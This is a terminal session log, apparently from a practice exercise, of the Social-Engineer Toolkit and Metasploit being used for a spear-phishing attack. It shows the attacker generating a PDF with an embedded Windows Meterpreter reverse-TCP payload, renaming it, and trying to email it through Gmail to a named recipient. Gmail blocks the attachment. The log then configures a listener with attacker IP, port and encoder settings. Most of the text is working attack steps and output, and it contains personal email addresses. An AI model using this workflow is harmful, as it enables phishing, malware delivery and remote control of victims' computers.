- [---] The Social-Engineer Toolkit (SET) [---]
- [---] Written by David Kennedy (ReL1K) [---]
- [---] Version: 1.0 [---]
- [---] Codename: 'Devolution' [---]
- [---] Report bugs to: davek@social-engineer.org [---]
- [---] Follow Me On Twitter: dave_rel1k [---]
- [---] Java Applet Written by: Thomas Werth [---]
- [---] Homepage: http://www.secmaniac.com [---]
- [---] Framework: http://www.social-engineer.org [---]
- [---] Over 1.4 million downloads and counting. [---]
- Welcome to the Social-Engineer Toolkit (SET). Your one
- stop shop for all of your social-engineering needs..
- DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com
- Select from the menu:
- 1. Spear-Phishing Attack Vectors
- 2. Website Attack Vectors
- 3. Infectious Media Generator
- 4. Create a Payload and Listener
- 5. Mass Mailer Attack
- 6. Teensy USB HID Attack Vector
- 7. SMS Spoofing Attack Vector
- 8 Update the Metasploit Framework
- 9. Update the Social-Engineer Toolkit
- 10. Help, Credits, and About
- 11. Exit the Social-Engineer Toolkit
- Enter your choice: 1
- Welcome to the SET E-Mail attack method. This module allows you
- to specially craft email messages and send them to a large (or small)
- number of people with attached fileformat malicious payloads. If you
- want to spoof your email address, be sure "Sendmail" is installed (it
- is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
- to SENDMAIL=ON.
- There are two options, one is getting your feet wet and letting SET do
- everything for you (option 1), the second is to create your own FileFormat
- payload and use it in your own attack. Either way, good luck and enjoy!
- 1. Perform a Mass Email Attack
- 2. Create a FileFormat Payload
- 3. Create a Social-Engineering Template
- 4. Return to Main Menu
- Enter your choice: 1
- Select the file format exploit you want.
- The default is the PDF embedded EXE.
- ********** PAYLOADS **********
- 1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
- 2. Adobe Flash Player 'Button' Remote Code Execution
- 3. Adobe CoolType SING Table 'uniqueName' Overflow
- 4. Adobe Flash Player 'newfunction' Invalid Pointer Use
- 5. Adobe Collab.collectEmailInfo Buffer Overflow
- 6. Adobe Collab.getIcon Buffer Overflow
- 7. Adobe JBIG2Decode Memory Corruption Exploit
- 8. Adobe PDF Embedded EXE Social Engineering
- 9. Adobe util.printf() Buffer Overflow
- 10. Custom EXE to VBA (sent via RAR) (RAR required)
- 11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
- 12. Adobe PDF Embedded EXE Social Engineering (NOJS)
- Enter the number you want (press enter for default): 8
- You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
- 1. Use your own PDF for attack
- 2. Use built-in BLANK PDF for attack
- Enter your choice (return for default): 1
- Enter path to your pdf (enter for default):
- [*] Defaulting to BLANK PDF built into SET...
- [*] Unable to find PDF, defaulting to blank PDF.
- 1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
- 2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
- 3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
- 4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
- 5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
- 6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
- 7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
- Enter the payload you want (press enter for default): 2
- Enter the port to connect back on (press enter for default): 4444
- [*] Generating fileformat exploit...
- [*] Payload creation complete.
- [*] All payloads get sent to the src/program_junk/template.pdf directory
- As an added bonus, use the file-format creator in SET to create your attachment.
- Right now the attachment will be imported with filename of 'template.whatever'
- Do you want to rename the file?
- example Enter the new filename: moo.pdf
- 1. Keep the filename, I don't care.
- 2. Rename the file, I want to be cool.
- Enter your choice (enter for default): 2
- Enter the new filename: practica.pdf
- Filename changed, moving on...
- Social Engineer Toolkit Mass E-Mailer
- There are two options on the mass e-mailer, the first would
- be to send an email to one individual person. The second option
- will allow you to import a list and send it to as many people as
- you want within that list.
- What do you want to do:
- 1. E-Mail Attack Single Email Address
- 2. E-Mail Attack Mass Mailer
- 3. Return to main menu.
- Enter your choice: 1
- Do you want to use a predefined template or craft
- a one time email template.
- 1. Pre-Defined Template
- 2. One-Time Use Email Template
- Enter your choice: 2
- Enter the subject of the email: practica
- Do you want to send the message as html or plain?
- 1. HTML
- 2. Plain
- Enter your choice (enter for plain): 1
- Enter the body of the message, hit return for a new line.
- Type your body and enter control+c when finished: practica
- Next line of the body: de
- Next line of the body: SET
- Next line of the body: ^C
- Enter who you want to send email to: dannyLopez68@gmail.com
- What option do you want to use?
- 1. Use a GMAIL Account for your email attack.
- 2. Use your own server or open relay
- Enter your choice: 1
- Enter your GMAIL email address: z3r0f15h@gmail.com
- Enter your password for gmail (it will not be displayed back to you):
- (552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines. x36sm18742937anx.34')
- (8, 'EOF occurred in violation of protocol')
- It appears your password was incorrect.
- Printing response: (8, 'EOF occurred in violation of protocol')
- Press enter to continue.
- SET has finished delivering the emails.
- Do you want to setup a listener yes or no: yes
- [-] ***
- [-] * WARNING: No database support: String User Disabled Database Support
- [-] ***
- _ _ _ _
- | | | | (_) |
- _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
- | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
- | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
- |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
- | |
- |_|
- =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
- + -- --=[ 639 exploits - 319 auxiliary
- + -- --=[ 215 payloads - 27 encoders - 8 nops
- =[ svn r11425 updated today (2010.12.27)
- resource (src/program_junk/meta_config)> use exploit/multi/handler
- resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- resource (src/program_junk/meta_config)> set LHOST 192.168.0.11
- LHOST => 192.168.0.11
- resource (src/program_junk/meta_config)> set LPORT 4444
- LPORT => 4444
- resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
- ENCODING => shikata_ga_nai
- resource (src/program_junk/meta_config)> set ExitOnSession false
- ExitOnSession => false
- resource (src/program_junk/meta_config)> exploit -j
- [*] Exploit running as background job.
- msf exploit(handler) >
- [*] Started reverse handler on 192.168.0.11:4444
- [*] Starting the payload handler...